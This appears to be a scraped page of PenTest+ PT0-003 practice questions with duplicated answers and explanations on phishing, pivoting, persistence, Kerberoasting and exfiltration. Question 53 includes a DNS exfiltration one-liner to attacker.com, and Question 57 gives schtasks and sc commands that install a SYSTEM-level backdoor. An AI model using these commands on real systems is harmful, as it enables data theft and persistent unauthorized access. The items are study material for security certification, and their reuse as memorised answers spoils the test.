Practice Free PT0-003 Exam Online Questions
Question #51
A penetration tester needs to complete cleanup activities from the testing lead.
Which of the following should the tester do to validate that reverse shell payloads are no longer running?
- A . Run scripts to terminate the implant on affected hosts.
- B . Spin down the C2 listeners.
- C . Restore the firewall settings of the original affected hosts.
- D . Exit from C2 listener active sessions.
Correct Answer: A
A
Explanation:
To ensure that reverse shell payloads are no longer running, it is essential to actively terminate any implanted malware or scripts.
Here ’ s why option A is correct:
Run Scripts to Terminate the Implant: This ensures that any reverse shell payloads or malicious implants are actively terminated on the affected hosts. It is a direct and effective method to clean up after a penetration test.
Spin Down the C2 Listeners: This stops the command and control listeners but does not remove the implants from the hosts.
Restore the Firewall Settings: This is important for network security but does not directly address the termination of active implants.
Exit from C2 Listener Active Sessions: This closes the current sessions but does not ensure that implants are terminated.
Reference from Pentest:
Anubis HTB: Demonstrates the process of cleaning up and ensuring that all implants are removed after an assessment.
Forge HTB: Highlights the importance of thoroughly cleaning up and terminating any payloads or implants to leave the environment secure post-assessment.
A
Explanation:
To ensure that reverse shell payloads are no longer running, it is essential to actively terminate any implanted malware or scripts.
Here ’ s why option A is correct:
Run Scripts to Terminate the Implant: This ensures that any reverse shell payloads or malicious implants are actively terminated on the affected hosts. It is a direct and effective method to clean up after a penetration test.
Spin Down the C2 Listeners: This stops the command and control listeners but does not remove the implants from the hosts.
Restore the Firewall Settings: This is important for network security but does not directly address the termination of active implants.
Exit from C2 Listener Active Sessions: This closes the current sessions but does not ensure that implants are terminated.
Reference from Pentest:
Anubis HTB: Demonstrates the process of cleaning up and ensuring that all implants are removed after an assessment.
Forge HTB: Highlights the importance of thoroughly cleaning up and terminating any payloads or implants to leave the environment secure post-assessment.
Question #52
A penetration tester is evaluating a company’s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign.
Which of the following tools and techniques are most applicable in this scenario? (Select two).
- A . TruffleHog for collecting credentials
- B . Shodan for identifying potential targets
- C . Gophish for sending phishing emails
- D . Maltego for organizing targets
- E . theHarvester for discovering additional targets
- F . Evilginx for handling legitimate authentication requests through a proxy
Correct Answer: C,F
C,F
Explanation:
To acquire valid credentials through a social engineering campaign, the tester needs (1) a way to deliver controlled phishing messages and track engagement, and (2) a method to capture authentication material when targets attempt to log in. Gophish is a phishing campaign framework used to send realistic emails, manage templates and landing pages, and collect campaign metrics (opens, clicks, submitted data). This directly supports the operational side of a sanctioned phishing assessment described in PenTest+ social engineering activities.
Evilginx aligns with credential acquisition by acting as a reverse-proxy phishing technique that relays “real” authentication traffic to the legitimate site while capturing credentials and related session artifacts during the login flow. This is especially relevant in modern environments where testers may need to evaluate the effectiveness of protections like MFA and conditional access controls.
C,F
Explanation:
To acquire valid credentials through a social engineering campaign, the tester needs (1) a way to deliver controlled phishing messages and track engagement, and (2) a method to capture authentication material when targets attempt to log in. Gophish is a phishing campaign framework used to send realistic emails, manage templates and landing pages, and collect campaign metrics (opens, clicks, submitted data). This directly supports the operational side of a sanctioned phishing assessment described in PenTest+ social engineering activities.
Evilginx aligns with credential acquisition by acting as a reverse-proxy phishing technique that relays “real” authentication traffic to the legitimate site while capturing credentials and related session artifacts during the login flow. This is especially relevant in modern environments where testers may need to evaluate the effectiveness of protections like MFA and conditional access controls.
Question #53
A penetration tester has discovered sensitive files on a system.
Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?
- A . Encoding the data and pushing through DNS to the tester’s controlled server.
- B . Padding the data and uploading the files through an external cloud storage service.
- C . Obfuscating the data and pushing through FTP to the tester’s controlled server.
- D . Hashing the data and emailing the files to the tester’s company inbox.
Correct Answer: A
A
Explanation:
DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.
Encoding the data and exfiltrating through DNS (Option A):
DNS is often overlooked by DLP systems because it is required for network functionality.
Attackers use DNS tunneling (e.g., dnscat2, IODINE) to exfiltrate data inside DNS queries.
Example method
echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Data Exfiltration Techniques"
Incorrect options:
Option B (Cloud storage): Many organizations monitor file uploads to cloud storage.
Option C (FTP): FTP is easily monitored and flagged by DLP solutions.
Option D (Hashing and emailing): Emails are actively scanned by DLP policies.
A
Explanation:
DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.
Encoding the data and exfiltrating through DNS (Option A):
DNS is often overlooked by DLP systems because it is required for network functionality.
Attackers use DNS tunneling (e.g., dnscat2, IODINE) to exfiltrate data inside DNS queries.
Example method
echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Data Exfiltration Techniques"
Incorrect options:
Option B (Cloud storage): Many organizations monitor file uploads to cloud storage.
Option C (FTP): FTP is easily monitored and flagged by DLP solutions.
Option D (Hashing and emailing): Emails are actively scanned by DLP policies.
Question #54
A tester wants to pivot from a compromised host to another network with encryption and the least amount of interaction with the compromised host.
Which of the following is the best way to accomplish this objective?
- A . Create an SSH tunnel using sshuttle to forward all the traffic to the compromised computer.
- B . Configure a VNC server on the target network and access the VNC server from the compromised computer.
- C . Set up a Metasploit listener on the compromised computer and create a reverse shell on the target network.
- D . Create a Netcat connection to the compromised computer and forward all the traffic to the target network.
Correct Answer: A
A
Explanation:
Pivoting allows attackers to use a compromised host as a gateway to access internal resources.
Create an SSH tunnel using sshuttle (Option A):
sshuttle creates a transparent VPN-like connection over SSH, allowing the tester to forward traffic securely.
Advantages:
Provides encryption, preventing IDS/IPS detection.
Requires minimal interaction with the compromised host.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Pivoting and Lateral Movement
Techniques"
Incorrect options:
Option B (VNC server): VNC lacks encryption and is easily detectable.
Option C (Metasploit listener): Reverse shells can be detected by EDR solutions.
Option D (Netcat connection): Netcat is plaintext, making it highly detectable.
A
Explanation:
Pivoting allows attackers to use a compromised host as a gateway to access internal resources.
Create an SSH tunnel using sshuttle (Option A):
sshuttle creates a transparent VPN-like connection over SSH, allowing the tester to forward traffic securely.
Advantages:
Provides encryption, preventing IDS/IPS detection.
Requires minimal interaction with the compromised host.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Pivoting and Lateral Movement
Techniques"
Incorrect options:
Option B (VNC server): VNC lacks encryption and is easily detectable.
Option C (Metasploit listener): Reverse shells can be detected by EDR solutions.
Option D (Netcat connection): Netcat is plaintext, making it highly detectable.
Question #55
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time.
Which of the following is the best tool for this task?
- A . Burp Suite
- B . masscan
- C . Nmap
- D . hping
Correct Answer: B
B
Explanation:
When needing to scan a large network for open ports quickly, the choice of tool is critical.
Here ’ s why option B is correct:
masscan: This tool is designed for high-speed port scanning and can scan entire networks much faster than traditional tools like Nmap. It can handle large ranges of IP addresses and ports with high efficiency.
Nmap: While powerful and versatile, Nmap is generally slower than masscan for scanning very large networks, especially when speed is crucial.
Burp Suite: This tool is primarily for web application security testing and not optimized for network-wide port scanning.
hping: This is a network tool used for packet crafting and network testing, but it is not designed for high-speed network port scanning.
Reference from Pentest:
Luke HTB: Highlights the use of efficient tools for large-scale network scanning to identify open ports quickly.
Anubis HTB: Demonstrates scenarios where high-speed scanning tools like masscan are essential for large network assessments.
B
Explanation:
When needing to scan a large network for open ports quickly, the choice of tool is critical.
Here ’ s why option B is correct:
masscan: This tool is designed for high-speed port scanning and can scan entire networks much faster than traditional tools like Nmap. It can handle large ranges of IP addresses and ports with high efficiency.
Nmap: While powerful and versatile, Nmap is generally slower than masscan for scanning very large networks, especially when speed is crucial.
Burp Suite: This tool is primarily for web application security testing and not optimized for network-wide port scanning.
hping: This is a network tool used for packet crafting and network testing, but it is not designed for high-speed network port scanning.
Reference from Pentest:
Luke HTB: Highlights the use of efficient tools for large-scale network scanning to identify open ports quickly.
Anubis HTB: Demonstrates scenarios where high-speed scanning tools like masscan are essential for large network assessments.
Question #56
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.
Through which of the following features could this information have been accessed?
- A . IAM
- B . Block storage
- C . Virtual private cloud
- D . Metadata services
Correct Answer: D
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
Question #57
A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week.
Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
- A . schtasks.exe
- B . rundll.exe
- C . cmd.exe
- D . chgusr.exe
- E . sc.exe
- F . netsh.exe
Correct Answer: A,E
A,E
Explanation:
To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.
schtasks.exe:
Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.
Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.
Example:
schtasks /create /tn "Backdoor" /tr "C: pathtobackdoor.exe" /sc daily /ru SYSTEM sc.exe:
Purpose: Service Control Manager command-line tool used to manage Windows services.
Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.
Example:
sc create backdoor binPath= "C: pathtobackdoor.exe" start= auto
Other Utilities:
rundll.exe: Used to run DLLs as applications, not typically used for persistence.
cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.
chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.
netsh.exe: Used for network configuration, not typically used for persistence.
Pentest
Reference: Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.
Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.
By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.
A,E
Explanation:
To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.
schtasks.exe:
Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.
Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.
Example:
schtasks /create /tn "Backdoor" /tr "C: pathtobackdoor.exe" /sc daily /ru SYSTEM sc.exe:
Purpose: Service Control Manager command-line tool used to manage Windows services.
Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.
Example:
sc create backdoor binPath= "C: pathtobackdoor.exe" start= auto
Other Utilities:
rundll.exe: Used to run DLLs as applications, not typically used for persistence.
cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.
chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.
netsh.exe: Used for network configuration, not typically used for persistence.
Pentest
Reference: Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.
Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.
By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.
Question #58
A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not
connected to the internet or enterprise network.
Which of the following should the tester utilize to conduct the testing?
- A . Channel scanning
- B . Stealth scans
- C . Source code analysis
- D . Manual assessment
Correct Answer: D
D
Explanation:
Since the ICS is air-gapped (not connected to external networks), the best approach is manual assessment, which involves on-site testing, physical access, and reviewing configurations to identify vulnerabilities.
Option A (Channel scanning) ❌ : This is used for wireless networks, not for isolated ICS systems.
Option B (Stealth scans) ❌ : A stealth scan is a method to avoid detection while scanning, but it still requires network connectivity.
Option C (Source code analysis) ❌ : If the ICS is a proprietary system, source code might not be available. Also, vulnerabilities could exist outside the code, such as misconfigurations.
Option D (Manual assessment) ✅ : Correct. The ICS is offline, so a manual review of system settings, firmware, and configurations is the best approach.
Reference: CompTIA PenTest+ PT0-003 Official Guide C ICS & SCADA Testing
D
Explanation:
Since the ICS is air-gapped (not connected to external networks), the best approach is manual assessment, which involves on-site testing, physical access, and reviewing configurations to identify vulnerabilities.
Option A (Channel scanning) ❌ : This is used for wireless networks, not for isolated ICS systems.
Option B (Stealth scans) ❌ : A stealth scan is a method to avoid detection while scanning, but it still requires network connectivity.
Option C (Source code analysis) ❌ : If the ICS is a proprietary system, source code might not be available. Also, vulnerabilities could exist outside the code, such as misconfigurations.
Option D (Manual assessment) ✅ : Correct. The ICS is offline, so a manual review of system settings, firmware, and configurations is the best approach.
Reference: CompTIA PenTest+ PT0-003 Official Guide C ICS & SCADA Testing
Question #59
During an assessment, a penetration tester runs the following command:
setspn.exe -Q /
Which of the following attacks is the penetration tester preparing for?
- A . LDAP injection
- B . Pass-the-hash
- C . Kerberoasting
- D . Dictionary
Correct Answer: C
C
Explanation:
Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the plaintext passwords.
Understanding Kerberoasting:
Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.
Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.
Command Breakdown:
setspn.exe -Q /: This command queries all SPNs in the domain.
Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.
Kerberoasting Steps:
Identify SPNs: Use setspn.exe to list service accounts with SPNs.
Request TGS Tickets: Request TGS tickets for the identified SPNs.
Extract Tickets: Use tools like Mimikatz to extract the service tickets.
Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.
Reference from Pentesting Literature:
Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.
HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
C
Explanation:
Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the plaintext passwords.
Understanding Kerberoasting:
Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.
Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.
Command Breakdown:
setspn.exe -Q /: This command queries all SPNs in the domain.
Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.
Kerberoasting Steps:
Identify SPNs: Use setspn.exe to list service accounts with SPNs.
Request TGS Tickets: Request TGS tickets for the identified SPNs.
Extract Tickets: Use tools like Mimikatz to extract the service tickets.
Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.
Reference from Pentesting Literature:
Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.
HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #60
A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools.
Which of the following is the best tool for the penetration tester to use?
- A . Caldera
- B . SpiderFoot
- C . Maltego
- D . WIGLE.net
Correct Answer: C
C
Explanation:
Penetration testers use OSINT (Open-Source Intelligence) tools to collect and analyze reconnaissance data.
Maltego (Option C):
Maltego is a powerful graph-based OSINT tool that integrates data from multiple sources (e.g., social media, DNS records, leaked credentials).
It automates data correlation and helps visualize connections.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "OSINT and Intelligence Gathering"
Incorrect options:
Option A (Caldera): Used for adversary emulation, not OSINT.
Option B (SpiderFoot): A reconnaissance tool but lacks data correlation capabilities.
Option D (WIGLE.net): A wireless network database, not an OSINT analysis tool.
C
Explanation:
Penetration testers use OSINT (Open-Source Intelligence) tools to collect and analyze reconnaissance data.
Maltego (Option C):
Maltego is a powerful graph-based OSINT tool that integrates data from multiple sources (e.g., social media, DNS records, leaked credentials).
It automates data correlation and helps visualize connections.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "OSINT and Intelligence Gathering"
Incorrect options:
Option A (Caldera): Used for adversary emulation, not OSINT.
Option B (SpiderFoot): A reconnaissance tool but lacks data correlation capabilities.
Option D (WIGLE.net): A wireless network database, not an OSINT analysis tool.